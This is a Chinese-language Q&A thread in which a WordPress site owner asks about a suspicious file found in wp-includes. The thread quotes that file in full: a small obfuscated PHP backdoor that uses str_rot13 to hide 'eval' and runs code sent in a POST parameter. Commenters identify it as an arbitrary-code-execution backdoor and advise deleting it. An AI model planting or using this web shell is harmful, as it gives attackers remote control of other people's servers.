【发布时间】:2016-08-18 07:37:37
【问题描述】:
我发现了一个可疑的 PHP 文件 /wp-includes/mera.php
内容:
<?php if(isset($_GET['test'])){echo 'success';}else{isset($_POST['vfj39']) && ($www= $_POST['vfj39']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add');}?>
@preg_replace('/ad/e','@'.str_rot13('riny').'($www)', 'add'); 会不会做一些恶意的事情?
【问题讨论】:
-
str_rot13('riny')返回eval... -
我不确定代码的作用,但该文件没有出现在任何 wordpress 文档中,因此除非您安装的应用程序之一使用它,否则它可能是恶意的。
-
该代码看起来可以运行任意代码。删除它,然后看看this codex page。
-
谢谢你们!我删除了文件并修复了 meta.php(请参阅下面的答案)。为什么 3 票投反对票?